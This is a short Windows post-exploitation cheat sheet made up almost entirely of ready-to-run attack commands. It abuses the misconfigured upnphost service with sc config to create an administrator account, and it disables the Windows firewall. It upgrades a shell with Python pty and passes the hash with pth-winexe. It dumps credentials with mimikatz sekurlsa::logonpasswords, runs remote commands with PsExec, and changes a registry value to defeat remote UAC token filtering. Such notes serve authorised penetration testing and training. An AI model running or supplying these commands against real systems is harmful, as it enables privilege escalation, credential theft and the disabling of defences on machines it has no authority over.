file transfer;
Winpriv check:
Local Privilege Escalation Abusing Misconfiguration Service (upnphost):
accesschk.exe -uwcqv "Authenticated Users" /accepteula accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula
accesschk.exe -ucqv upnphost sc config upnphost depend= "" sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"
sc stop upnphost sc start upnphost
File Transfer via FTP
ftp > binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
Python Interactive Shell
pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off
Disable windows firewall on older windows: netsh firewall set opmode disable


pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE // cmd.exe

via sysinternals tools and mimikatz

  • PtH get user ntlm hash. (via RDP, MSF or other)
mimikatz# privilege::debug
mimikatz# privilege::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}
then open new cmd. you can run command via psexec.
windows> PsExec.exe \\{IP} cmd
Tip: General usage with password:
PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd
if got "Couldn't access otherComputer: Access is denied." ERROR:
run the following command at target system:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f